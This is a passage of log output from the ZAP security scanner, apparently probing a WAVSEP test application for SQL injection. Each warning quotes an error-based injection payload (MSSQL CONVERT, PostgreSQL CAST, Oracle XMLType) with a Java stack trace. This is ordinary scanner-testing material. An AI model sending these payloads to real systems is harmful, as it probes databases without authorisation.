CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5357=5357) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('vOfd'='vOfd at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681246 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 3605=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3605=3605) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('uMWX'='uMWX] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 3605=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3605=3605) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('uMWX'='uMWX at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681247 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 1093=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (1093=1093) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'CXII'='CXII] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' AND 1093=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (1093=1093) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'CXII'='CXII at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681247 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 1436=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1436=1436) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'DodE'='DodE] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 1436=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1436=1436) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'DodE'='DodE at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681248 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 8924=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8924=8924) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' AND 8924=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8924=8924) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681249 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 2930=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2930=2930) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 2930=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2930=2930) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681250 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 8993=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8993=8993) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- jnMc] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND 8993=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8993=8993) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- jnMc at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681250 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 4710=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4710=4710) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- amsM] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 4710=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4710=4710) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- amsM at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681251 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 3351=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3351=3351) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (6554=6554] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) AND 3351=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3351=3351) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (6554=6554 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681252 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 8480=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8480=8480) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (2268=2268] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 8480=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8480=8480) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (2268=2268 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681253 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 5662=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5662=5662) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND 5662=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5662=5662) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681253 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 8855=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8855=8855) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 8855=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8855=8855) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681254 [ZAP-ActiveScanner-0] WARN 